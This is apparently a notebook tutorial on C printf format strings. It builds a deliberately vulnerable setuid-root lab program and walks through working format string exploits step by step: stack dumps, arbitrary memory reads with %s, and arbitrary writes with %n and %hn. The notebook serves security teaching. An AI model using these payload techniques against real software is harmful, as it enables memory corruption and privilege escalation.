# Format Strings
http://www.cplusplus.com/reference/cstdio/printf/?kw=printf

- `printf()` in C/C++ prints fixed strings and variables in many different formats
- hello.c passes its text directly to `printf()` as the format string; this is harmless only because the text is a fixed literal
- the "Hello World!\n" string is technically the format string (devoid of the special escape sequences called format parameters)
- format parameters begin with a `%` sign; for each format parameter the function expects a corresponding argument
- a format specifier follows this prototype:
`%[flags][width][.precision][length]specifier`

- the following parameters expect values as arguments

| Parameter | Output Type |
| --- | --- |
| %d | Decimal |
| %u | Unsigned decimal |
| %x | Hexadecimal |

- the following parameters expect pointers as arguments

| Parameter | Output Type |
| --- | --- |
| %s | String |
| %n | Number of bytes written so far |
| %p | Memory address |

In [1]:
# copy hello.c from booksrc folder
! cp booksrc/hello.c .
! ls -al hello.c

-rw-r--r-- 1 user user 78 Aug  7 10:05 hello.c


In [2]:
! cat hello.c

#include <stdio.h>

int main() {
    printf("Hello World!\n");
    return 0;
}

## Use compile.sh script to compile c programs
- disables all compiler- and system-level buffer overflow protections

In [3]:
# compile and run hello.c
! cp booksrc/compile.sh .
! chmod u+x compile.sh
! ./compile.sh hello.c hello.exe

In [4]:
! ./hello.exe

Hello World!


## Format Parameters Examples
- copy fmt_strings.c from booksrc; examine, compile and run it

In [6]:
! cp ./booksrc/fmt_strings.c .

In [7]:
! cat fmt_strings.c

// fmt_strings.c

#include <stdio.h>
#include <string.h>

int main() {
   char string[10];
   int A = -73;
   unsigned int B = 31337;

   strcpy(string, "sample");

   // Example of printing with different format string
   printf("[A] Dec: %d, Hex: %x, Unsigned: %u\n", A, A, A);
   printf("[B] Dec: %d, Hex: %x, Unsigned: %u\n", B, B, B);
   printf("[field width on B] 3: '%3u', 10: '%10u', '%08u'\n", B, B, B);
   printf("[string] %s  Address %p\n", string, string);

   // Example of unary address operator (dereferencing) and a %x format string
   printf("variable A is at address: %p\n", &A);
}

In [8]:
! ./compile.sh fmt_strings.c fmt_strings.exe

In [9]:
# note the large unsigned value for A: negative values are stored in two's complement
! ./fmt_strings.exe

[A] Dec: -73, Hex: ffffffb7, Unsigned: 4294967223
[B] Dec: 31337, Hex: 7a69, Unsigned: 31337
[field width on B] 3: '31337', 10: '     31337', '00031337'
[string] sample  Address 0xffffd0a2
variable A is at address: 0xffffd09c


## Format Parameter %n Example
- %n - uncommon, but let's understand how it works
- %n - writes the number of bytes written so far to the corresponding variable's address

In [10]:
! cp booksrc/fmt_uncommon.c .

In [11]:
cat fmt_uncommon.c

#include <stdio.h>
#include <stdlib.h>

int main() {
   int A = 5, B = 7, count_one, count_two;

   // Example of a %n format string
   printf("The number of bytes written up to this point X%n is being stored in count_one, and the number of bytes up to here X%n is being stored in count_two.\n", &count_one, &count_two);

   printf("count_one: %d\n", count_one);
   printf("count_two: %d\n", count_two);

   // Stack Example
   printf("A is %d and is at %08x.  B is %x.\n", A, &A, B);

   exit(0);
}	


In [12]:
! ./compile.sh fmt_uncommon.c fmt_uncommon.exe

In [13]:
! ./fmt_uncommon.exe

The number of bytes written up to this point X is being stored in count_one, and the number of bytes up to here X is being stored in count_two.
count_one: 46
count_two: 113
A is 5 and is at ffffd0a8.  B is 7.


### structure of stack when printf( ) is called in fmt_uncommon.c
- look at the last printf()

### printf("A is %d and is at %08x.  B is %x.\n", A, &A, B);

- hint: arguments are pushed onto the stack in reverse order, so the first argument (the format string address) ends up on top


|Top of the stack|
| :----: |
| Address of format string (first argument)|
| Value of A|
| Address of A|
| Value of B|
| ... |
| Bottom of the Stack|

### what if fewer arguments are passed to printf()?
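- `printf("A is %d and is at %08x. B is %x.\n", A, &A);`
- `printf()` still fetches a value for the third format parameter from the stack slot where the argument would have been, so `%x` prints whatever happens to be there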

In [14]:
! sed -e 's/, B)/)/' fmt_uncommon.c > fmt_uncommon2.c

In [15]:
! diff fmt_uncommon.c fmt_uncommon2.c

14c14
<    printf("A is %d and is at %08x.  B is %x.\n", A, &A, B);
---
>    printf("A is %d and is at %08x.  B is %x.\n", A, &A);


In [16]:
! ./compile.sh fmt_uncommon2.c fmt_uncommon2.exe

In [17]:
! ./fmt_uncommon2.exe

The number of bytes written up to this point X is being stored in count_one, and the number of bytes up to here X is being stored in count_two.
count_one: 46
count_two: 113
A is 5 and is at ffffd0a8.  B is 804845d.


## The Format String Vulnerability
- the vulnerability arises when a user-controlled string is passed directly as the format string, `printf(string)`, instead of being printed with `printf("%s", string)`
- compile and run fmt_vuln.c from booksrc folder

```bash
$ ./compile.sh fmt_vuln.c fmt_vuln.exe
$ sudo chown root:root ./fmt_vuln.exe
$ sudo chmod u+s ./fmt_vuln.exe
$ ./fmt_vuln.exe testing
$ ./fmt_vuln.exe testing%x
$ ./fmt_vuln.exe $(perl -e 'print "%08x."x40')
```

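- with enough `%08x.` parameters, the dump shows the same bytes repeating, each four-byte word printed in reverse byte order (little-endian architecture)
- `printf "\x25\x30\x38\x78\x2e\n"` prints `%08x.`
    - these bytes are the format string itself, which is stored at higher memory addresses, where `printf()` goes looking for its arguments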

In [19]:
! cp ./booksrc/fmt_vuln.c .
! cat fmt_vuln.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
   char text[1024];
   static int test_val = -72;

   if(argc < 2) {
      printf("Usage: %s <text to print>\n", argv[0]);
      exit(0);
   }
   strcpy(text, argv[1]);

   printf("The right way to print user-controlled input:\n");
   printf("%s", text);

   printf("\nThe wrong way to print user-controlled input:\n");
   printf(text);

   printf("\n");

   // Debug output
   printf("[*] test_val @ 0x%08x = %d 0x%08x\n", &test_val, test_val, test_val);

   exit(0);
}


In [20]:
! echo user | sudo -S ./compile.sh fmt_vuln.c fmt_vuln.exe

[sudo] password for user: 

In [21]:
# user is password for sudo user
! echo user | sudo -S chown root:root ./fmt_vuln.exe

[sudo] password for user: 

In [22]:
# check ownership of the fmt_vuln.exe
! ls -al fmt_vuln.exe

-rwxr-xr-x 1 root root 9624 Aug  7 10:12 fmt_vuln.exe


In [23]:
! echo user | sudo -S chmod u+s ./fmt_vuln.exe

[sudo] password for user: 

In [24]:
! ls -al fmt_vuln.exe

-rwsr-xr-x 1 root root 9624 Aug  7 10:12 fmt_vuln.exe


In [25]:
# run fmt_vuln.exe
! ./fmt_vuln.exe

Usage: ./fmt_vuln.exe <text to print>


In [26]:
! ./fmt_vuln.exe testing

The right way to print user-controlled input:
testing
The wrong way to print user-controlled input:
testing
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [27]:
# what if you provide %s as value
! ./fmt_vuln.exe testing%s
# notice testing repeats twice!

The right way to print user-controlled input:
testing%s
The wrong way to print user-controlled input:
testingtesting%s
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [28]:
# what if you provide %x as value
! ./fmt_vuln.exe testing%x

The right way to print user-controlled input:
testing%x
The wrong way to print user-controlled input:
testingffffccb0
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [46]:
# this process can be repeated to examine stack memory
# just supply many format parameters in the string and see what's on the stack
! ./fmt_vuln.exe $(perl -e 'print "%08x."x40')

The right way to print user-controlled input:
%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.
The wrong way to print user-controlled input:
bfffe780.00000000.b7fff858.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [29]:
# the bytes 25 30 38 78 2e repeat throughout the dump above
# each four-byte word appears byte-reversed due to the little-endian architecture
! perl -e 'print "\x25\x30\x38\x78\x2e"'

%08x.

In [31]:
# try to read the same stack values as strings; %s treats each value as a pointer, and an invalid one crashes
! ./fmt_vuln.exe $(perl -e 'print "%s."x40')

The right way to print user-controlled input:
%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.
The wrong way to print user-controlled input:
Segmentation fault


## Reading from Arbitrary Memory Addresses
- `%s` format parameter can be used to read from arbitrary memory addresses
- part of the original format string can be used to supply an address to the %s format parameter
- if a valid memory address is used, this process could be used to read a string found at that memory address
- compile and run booksrc/getenvaddr.c
- use the path address to provide the value for %s
```bash
$ ./fmt_vuln.exe $(printf "<address bytes as \x.. escapes, in reverse order>")%08x.%08x.%08x.%s
```

In [32]:
! ./fmt_vuln.exe AAAA.%08x.%08x.%08x.%08x
# notice that the fourth parameter reads its data from the beginning of the
# format string: 41414141 is AAAA

The right way to print user-controlled input:
AAAA.%08x.%08x.%08x.%08x
The wrong way to print user-controlled input:
AAAA.ffffcca0.f7dd0658.080484f0.41414141
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [62]:
! ./fmt_vuln.exe AAAA%08x.%08x.%08x.%s
# why do we get segfault?
# it's attempting to print string at the address AAAA

The right way to print user-controlled input:
AAAA%08x.%08x.%08x.%s
The wrong way to print user-controlled input:
Segmentation fault


In [33]:
# how about we provide a valid memory address instead of AAAA
! env | grep '^PATH='

PATH=/home/user/miniconda3/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games


In [34]:
# compile and run getenvaddr.c to find the address an environment variable will have inside a target program
! cp ./booksrc/getenvaddr.c .

In [35]:
! cat getenvaddr.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
	char *ptr;

	if(argc < 3) {
		printf("Usage: %s <environment variable> <target program name>\n", argv[0]);
		exit(0);
	}
	ptr = getenv(argv[1]); /* get env var location */
	ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* adjust for program name */
	printf("%s will be at %p\n", argv[1], ptr);
}


In [36]:
! ./compile.sh getenvaddr.c getenvaddr.exe

In [37]:
! ./getenvaddr.exe PATH ./fmt_vuln.exe

PATH will be at 0xffffd637


In [38]:
# let's try to read the value of PATH using fmt_vuln.exe
! ./fmt_vuln.exe $(perl -e 'print "\x37\xd6\xff\xff"')%08x.%08x.%08x.%s

The right way to print user-controlled input:
7���%08x.%08x.%08x.%s
The wrong way to print user-controlled input:
7���ffffcca0.f7dd0658.080484f0.ome/user/miniconda3/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
[*] test_val @ 0x0804a02c = -72 0xffffffb8


### Notice /h is missing from /home/user/...
- this is because getenvaddr.exe (14 characters) is 2 bytes longer than fmt_vuln.exe (12 characters)
- we can compensate by subtracting 2 from the least significant byte of the reported PATH address

In [39]:
! printf "%x" $((0x37-2))

35

In [40]:
! ./fmt_vuln.exe $(perl -e 'print "\x35\xd6\xff\xff"')%08x.%08x.%08x.%s
# now we see our complete path

The right way to print user-controlled input:
5���%08x.%08x.%08x.%s
The wrong way to print user-controlled input:
5���ffffcca0.f7dd0658.080484f0./home/user/miniconda3/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
[*] test_val @ 0x0804a02c = -72 0xffffffb8


## Writing to Arbitrary Memory Addresses
- `%s` is used to read from an arbitrary memory address
- the `%n` format parameter can be used to write to an arbitrary memory address
- the debug statement in fmt_vuln.c prints the address and value of the `test_val` variable, which makes it a convenient target
```bash
$ fmt_vuln.exe $(printf "\x reverse address of test_val")%08x.%08x.%08x.%n
```
- the resulting value in `test_val` depends on the number of bytes written before the `%n`
- this can be controlled to a greater degree by manipulating the field width option
```bash
$ fmt_vuln.exe $(printf "\x reverse address of test_val")%x%x%x%n
$ fmt_vuln.exe $(printf "\x reverse address of test_val")%x%x%100x%n
$ fmt_vuln.exe $(printf "\x reverse address of test_val")%x%x%400x%n
```

In [85]:
! ./fmt_vuln.exe testing

The right way to print user-controlled input:
testing
The wrong way to print user-controlled input:
testing
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [42]:
# test_val is @ 0x0804a02c
# instead of reading test_val, let's write to it
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%08x.%08x.%08x.%n
# notice test_val now holds the total number of bytes written by printf() before %n (31)

The right way to print user-controlled input:
,�%08x.%08x.%08x.%n
The wrong way to print user-controlled input:
,�ffffcca0.f7dd0658.080484f0.
[*] test_val @ 0x0804a02c = 31 0x0000001f


In [43]:
# value can be controlled by manipulating the field width
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%x.%x.%x.%n

The right way to print user-controlled input:
,�%x.%x.%x.%n
The wrong way to print user-controlled input:
,�ffffcca0.f7dd0658.80484f0.
[*] test_val @ 0x0804a02c = 30 0x0000001e


In [44]:
# value can be controlled by manipulating the field width
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%x.%x.%100x.%n

The right way to print user-controlled input:
,�%x.%x.%100x.%n
The wrong way to print user-controlled input:
,�ffffcca0.f7dd0658.                                                                                             80484f0.
[*] test_val @ 0x0804a02c = 123 0x0000007b


In [45]:
# value can be controlled by manipulating the field width
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%x.%x.%200x.%n

The right way to print user-controlled input:
,�%x.%x.%200x.%n
The wrong way to print user-controlled input:
,�ffffcca0.f7dd0658.                                                                                                                                                                                                 80484f0.
[*] test_val @ 0x0804a02c = 223 0x000000df


## Writing User-Controlled Values (0xaddress)
- the above trick (manipulating width) works for small numbers but won't work for large ones like memory addresses
- let's write 0xDDCCBBAA to variable test_val
- 0xAA goes to least significant byte, 0xBB to next byte and so on and 0xDD goes to the most significant byte
- 0xAA -> 0x0804a02c
- 0xBB -> 0x0804a02d
- 0xCC -> 0x0804a02e
- 0xDD -> 0x0804a02f

In [46]:
# find out the width value needed to write 0xaa to the first address
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%x%x%8x%n

The right way to print user-controlled input:
,�%x%x%8x%n
The wrong way to print user-controlled input:
,�ffffcca0f7dd0658 80484f0
[*] test_val @ 0x0804a02c = 28 0x0000001c


In [47]:
# 0xaa is the target value; width 8 gave 28, so the new width is 0xaa - 28 + 8
!echo $(( 0xaa - 28 + 8))

150


In [48]:
# replace width 8 with 150
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%x%x%150x%n
# test_val = 0x000000aa
# the least significant byte, 0xaa, is now in the right place

The right way to print user-controlled input:
,�%x%x%150x%n
The wrong way to print user-controlled input:
,�ffffcca0f7dd0658                                                                                                                                               80484f0
[*] test_val @ 0x0804a02c = 170 0x000000aa


In [49]:
# next write 0xbb, 0xcc, and 0xdd
# each additional %n needs its own address, and each additional %x needs a 4-byte word (JUNK) to consume
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08JUNK\x2d\xa0\x04\x08JUNK\x2e\xa0\x04\x08JUNK\x2f\xa0\x04\x08"')%x%x%8x%n

The right way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�%x%x%8x%n
The wrong way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�ffffcc90f7dd0658 80484f0
[*] test_val @ 0x0804a02c = 52 0x00000034


In [50]:
# what is the width so the final value is 0xaa
! echo $(( 0xaa-52+8 ))

126


In [51]:
# replace width 8 with 126 to write 0xaa
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08JUNK\x2d\xa0\x04\x08JUNK\x2e\xa0\x04\x08JUNK\x2f\xa0\x04\x08"')%x%x%126x%n

The right way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�%x%x%126x%n
The wrong way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�ffffcc90f7dd0658                                                                                                                       80484f0
[*] test_val @ 0x0804a02c = 170 0x000000aa


In [52]:
! echo $(( 0xbb - 0xaa ))

17


In [53]:
# now write 0xbb in correct address
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08JUNK\x2d\xa0\x04\x08JUNK\x2e\xa0\x04\x08JUNK\x2f\xa0\x04\x08"')%x%x%126x%n%17x%n

The right way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�%x%x%126x%n%17x%n
The wrong way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�ffffcc80f7dd0658                                                                                                                       80484f0         4b4e554a
[*] test_val @ 0x0804a02c = 48042 0x0000bbaa


In [54]:
! echo $(( 0xcc - 0xbb ))

17


In [55]:
# now write 0xcc in correct address
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08JUNK\x2d\xa0\x04\x08JUNK\x2e\xa0\x04\x08JUNK\x2f\xa0\x04\x08"')%x%x%126x%n%17x%n%17x%n

The right way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�%x%x%126x%n%17x%n%17x%n
The wrong way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�ffffcc80f7dd0658                                                                                                                       80484f0         4b4e554a         4b4e554a
[*] test_val @ 0x0804a02c = 13417386 0x00ccbbaa


In [None]:
# finally write 0xdd

In [56]:
! echo $(( 0xdd - 0xcc ))

17


In [107]:
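# now write 0xdd in correct address
# this cell was run with different stack contents (the second %x prints a single digit), so the first width is 133 instead of 126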
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08JUNK\x2d\xa0\x04\x08JUNK\x2e\xa0\x04\x08JUNK\x2f\xa0\x04\x08"')%x%x%133x%n%17x%n%17x%n%17x%n

The right way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�%x%x%133x%n%17x%n%17x%n%17x%n
The wrong way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�bfffe8100                                                                                                                             b7fff858         4b4e554a         4b4e554a         4b4e554a
[*] test_val @ 0x0804a02c = -573785174 0xddccbbaa


## Direct Parameter Access
- simplified way to exploit format string vulnerability
- allows parameters to be accessed directly by using the dollar sign qualifier
    - e.g., `%n$d` would access the nth parameter and display it as a decimal number
- instead of stepping through the first three parameters sequentially and using 4-byte JUNK spacers to increment the byte output count, we can use direct parameter access
- let's write a more realistic-looking address, `0xbffffd72`, into the variable `test_val`
- the example in demo-programs shows how direct parameter access works

In [58]:
! cp ./demo-programs/fmtstr_directpara.c .

In [60]:
! cat fmtstr_directpara.c

#include <stdio.h>

int main() {
    printf("7th: %7$d, 4th: %4$05d\n", 10, 20, 30, 40, 50, 60, 70, 80);
    return 0;
}


In [59]:
! ./compile.sh fmtstr_directpara.c directpara.exe

In [61]:
! ./directpara.exe

7th: 70, 4th: 00040


In [62]:
# without direct access
! ./fmt_vuln.exe AAAA%x%x%x%x

The right way to print user-controlled input:
AAAA%x%x%x%x
The wrong way to print user-controlled input:
AAAAffffcca0f7dd065880484f041414141
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [63]:
# access the fourth argument (from beginning of the format string)
# $ sign is special character for bash so must be escaped
! ./fmt_vuln.exe AAAA%4\$x

The right way to print user-controlled input:
AAAA%4$x
The wrong way to print user-controlled input:
AAAA41414141
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [64]:
# use the same technique to write to 4th argument
! ./fmt_vuln.exe $(perl -e 'print "AAAA"')%4\$n

The right way to print user-controlled input:
AAAA%4$n
The wrong way to print user-controlled input:
Segmentation fault


In [65]:
# no segfault when AAAA is replaced with a valid memory address
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%4\$n

The right way to print user-controlled input:
,�%4$n
The wrong way to print user-controlled input:
,�
[*] test_val @ 0x0804a02c = 4 0x00000004


In [66]:
# no need of JUNK just use direct parameter access to write the rest
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08" . "\x2d\xa0\x04\x08" . "\x2e\xa0\x04\x08" . "\x2f\xa0\x04\x08"')%4\$n

The right way to print user-controlled input:
,�-�.�/�%4$n
The wrong way to print user-controlled input:
,�-�.�/�
[*] test_val @ 0x0804a02c = 16 0x00000010


In [67]:
# do some math to print 0x72 of our controlled address: 0xbffffd72
! echo $((0x72 - 16))

98


In [68]:
# use 98 as width to get 0x72 as least significant value
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08" . "\x2d\xa0\x04\x08" . "\x2e\xa0\x04\x08" . "\x2f\xa0\x04\x08"')%98x%4\$n

The right way to print user-controlled input:
,�-�.�/�%98x%4$n
The wrong way to print user-controlled input:
,�-�.�/�                                                                                          ffffcca0
[*] test_val @ 0x0804a02c = 114 0x00000072


In [69]:
# do some math to print 0xfd of our controlled address: 0xbffffd72
! echo $((0xfd-0x72))

139


In [70]:
# use 139 as width to get 0xfd as next value
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08" . "\x2d\xa0\x04\x08" . "\x2e\xa0\x04\x08" . "\x2f\xa0\x04\x08"')%98x%4\$n%139x%5\$n

The right way to print user-controlled input:
,�-�.�/�%98x%4$n%139x%5$n
The wrong way to print user-controlled input:
,�-�.�/�                                                                                          ffffcc90                                                                                                                                   f7dd0658
[*] test_val @ 0x0804a02c = 64882 0x0000fd72


In [71]:
# do some math to print 0xff of our controlled address: 0xbffffd72
! echo $((0xff-0xfd))

2


In [72]:
# a width of 2 doesn't work: it is shorter than the value %x prints
# so wrap around and aim for 0x1ff instead of 0xff
! echo $((0x1ff-0xfd))

258


In [73]:
# use 258 as width to get 0xff as the next byte
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08" . "\x2d\xa0\x04\x08" . "\x2e\xa0\x04\x08" . "\x2f\xa0\x04\x08"')%98x%4\$n%139x%5\$n%258x%6\$n

The right way to print user-controlled input:
,�-�.�/�%98x%4$n%139x%5$n%258x%6$n
The wrong way to print user-controlled input:
,�-�.�/�                                                                                          ffffcc80                                                                                                                                   f7dd0658                                                                                                                                                                                                                                                           80484f0
[*] test_val @ 0x0804a02c = 33553778 0x01fffd72


In [74]:
# do some math to print 0xbf of our controlled address: 0xbffffd72
! echo $((0xbf-0xff))

-64


In [75]:
# negative width will not work!
! echo $((0x1bf-0xff))

192


In [76]:
# use 192 as width to get 0xbf as the most significant byte
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08" . "\x2d\xa0\x04\x08" . "\x2e\xa0\x04\x08" . "\x2f\xa0\x04\x08"')%98x%4\$n%139x%5\$n%258x%6\$n%192x%7\$n

The right way to print user-controlled input:
,�-�.�/�%98x%4$n%139x%5$n%258x%6$n%192x%7$n
The wrong way to print user-controlled input:
,�-�.�/�                                                                                          ffffcc80                                                                                                                                   f7dd0658                                                                                                                                                                                                                                                           80484f0                                                                                                                                                                                         804a02c
[*] test_val @ 0x0804a02c = -1073742478 0xbffffd72


## Using Short (2 bytes) Writes
- a `short` is typically a two-byte word; the `h` length modifier tells `%n` to write a `short`
- this lets an entire four-byte value be written with just two `%hn` parameters
    - instead of 4!
- let's overwrite test_val variable with the address `0xbffffd72`

In [78]:
# a plain %n overwrites all four bytes of test_val
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%x%x%x%n

The right way to print user-controlled input:
,�%x%x%x%n
The wrong way to print user-controlled input:
,�ffffcca0f7dd065880484f0
[*] test_val @ 0x0804a02c = 27 0x0000001b


In [77]:
# %hn overwrites only the two lower bytes; the two upper bytes keep 0xffff
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%x%x%x%hn

The right way to print user-controlled input:
,�%x%x%x%hn
The wrong way to print user-controlled input:
,�ffffcca0f7dd065880484f0
[*] test_val @ 0x0804a02c = -65509 0xffff001b


In [80]:
# short write can be used with direct parameter access
# write to the two upper bytes by targeting address + 2
! ./fmt_vuln.exe $(perl -e 'print "\x2e\xa0\x04\x08"')%4\$hn

The right way to print user-controlled input:
.�%4$hn
The wrong way to print user-controlled input:
.�
[*] test_val @ 0x0804a02c = 327608 0x0004ffb8


In [81]:
# let's write 0xbffffd72 to test_val
# 0xfd72 is written to the two lower bytes
# the two addresses account for 8 bytes of output, so subtract 8 from the target
#  ./fmt_vuln.exe $(printf "\x2c\xa0\x04\x08\x2e\xa0\x04\x08")%[w]x%4\$hn%[w]x%5\$hn
! echo $((0xfd72-8))

64874


In [79]:
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08\x2e\xa0\x04\x08"')%64874x%4\$hn

The right way to print user-controlled input:
,�.�%64874x%4$hn
The wrong way to print user-controlled input:
,�.�                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            

In [82]:
# 0xbfff is written to the two upper bytes
! echo $((0xbfff-0xfd72))

-15731


In [83]:
# the result is negative, so wrap around by aiming for 0x1bfff instead
! echo $((0x1bfff-0xfd72))

49805


In [84]:
# finally write 0xbffffd72 to test_val using 4th and 5th parameters
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08\x2e\xa0\x04\x08"')%64874x%4\$hn%49805x%5\$hn

The right way to print user-controlled input:
,�.�%64874x%4$hn%49805x%5$hn
The wrong way to print user-controlled input:
,�.�                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                

## Control the execution flow of the program
- one option is to overwrite the return address in the most recent stack frame
- a stack-based overflow typically only allows overwriting the return address
- a format string vulnerability provides the ability to overwrite any writable memory address!

### Detours with .dtors
#### Note: modern gcc no longer emits .dtors and .ctors (it uses .fini_array and .init_array), so the lookups below come up empty
- in GNU C compiled programs, special table sections called .dtors and .ctors are created
- .dtors are made for destructors
- .ctors are made for constructors
- a function can be declared as a destructor function by defining the destructor attribute
- let's see dtors_sample.c

In [85]:
! cp ./booksrc/dtors_sample.c .

In [86]:
! cat dtors_sample.c

#include <stdio.h>
#include <stdlib.h>

static void cleanup(void) __attribute__ ((destructor));

int main() {
   printf("Some actions happen in the main() function..\n");
   printf("and then when main() exits, the destructor is called..\n");

   exit(0);
}

void cleanup(void) {
   printf("In the cleanup function now..\n");
}


In [89]:
! ./compile.sh dtors_sample.c dtors_sample.exe

In [90]:
! ./dtors_sample.exe

Some actions happen in the main() function..
and then when main() exits, the destructor is called..
In the cleanup function now..


In [91]:
# the nm command can be used to find the address of cleanup()
# look for __DTOR_LIST__ and __DTOR_END__
# won't find them!!

! nm ./dtors_sample.exe

0804a020 B __bss_start
0804848e t cleanup
0804a020 b completed.6612
0804a018 D __data_start
0804a018 W data_start
08048390 t deregister_tm_clones
08048370 T _dl_relocate_static_pie
08048410 t __do_global_dtors_aux
08049f0c t __do_global_dtors_aux_fini_array_entry
0804a01c D __dso_handle
08049f14 d _DYNAMIC
0804a020 D _edata
0804a024 B _end
         U exit@@GLIBC_2.0
08048528 T _fini
0804853c R _fp_hw
08048440 t frame_dummy
08049f08 t __frame_dummy_init_array_entry
08048770 r __FRAME_END__
0804a000 d _GLOBAL_OFFSET_TABLE_
         w __gmon_start__
080485cc r __GNU_EH_FRAME_HDR
080482c8 T _init
08049f0c t __init_array_end
08049f08 t __init_array_start
08048540 R _IO_stdin_used
08048520 T __libc_csu_fini
080484c0 T __libc_csu_init
         U __libc_start_main@@GLIBC_2.0
08048446 T main
         U puts@@GLIBC_2.0
080483d0 t register_tm_clones
08048330 T _start
0804a020 D __TMC_END__
080484b9 T __x86.get_pc_thunk.ax
08048521 T __x86.get_pc_thunk.bp
080483

In [92]:
! nm ./dtors_sample.exe | grep DTOR

In [93]:
! nm ./fmt_vuln.exe | grep DTOR

In [94]:
# display all section headers
!readelf -S dtors_sample.exe

There are 34 section headers, starting at offset 0x1f84:

Section Headers:
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            00000000 000000 000000 00      0   0  0
  [ 1] .interp           PROGBITS        08048154 000154 000013 00   A  0   0  1
  [ 2] .note.ABI-tag     NOTE            08048168 000168 000020 00   A  0   0  4
  [ 3] .note.gnu.build-i NOTE            08048188 000188 000024 00   A  0   0  4
  [ 4] .gnu.hash         GNU_HASH        080481ac 0001ac 000020 04   A  5   0  4
  [ 5] .dynsym           DYNSYM          080481cc 0001cc 000060 10   A  6   1  4
  [ 6] .dynstr           STRTAB          0804822c 00022c 00004f 00   A  0   0  1
  [ 7] .gnu.version      VERSYM          0804827c 00027c 00000c 02   A  5   0  2
  [ 8] .gnu.version_r    VERNEED         08048288 000288 000020 00   A  6   1  4
  [ 9] .rel.dyn          REL             080482a8 0002a8 000008 08   A  5   0  4
  [10] .rel.plt     

In [95]:
# objdump command shows the actual contents of the .dtors section
! objdump -s -j .dtors ./dtors_sample.exe


./dtors_sample.exe:     file format elf32-i386

objdump: section '.dtors' mentioned in a -j option, but not found in any input file


In [96]:
! objdump -h ./dtors_sample.exe


./dtors_sample.exe:     file format elf32-i386

Sections:
Idx Name          Size      VMA       LMA       File off  Algn
  0 .interp       00000013  08048154  08048154  00000154  2**0
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  1 .note.ABI-tag 00000020  08048168  08048168  00000168  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  2 .note.gnu.build-id 00000024  08048188  08048188  00000188  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  3 .gnu.hash     00000020  080481ac  080481ac  000001ac  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  4 .dynsym       00000060  080481cc  080481cc  000001cc  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  5 .dynstr       0000004f  0804822c  0804822c  0000022c  2**0
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
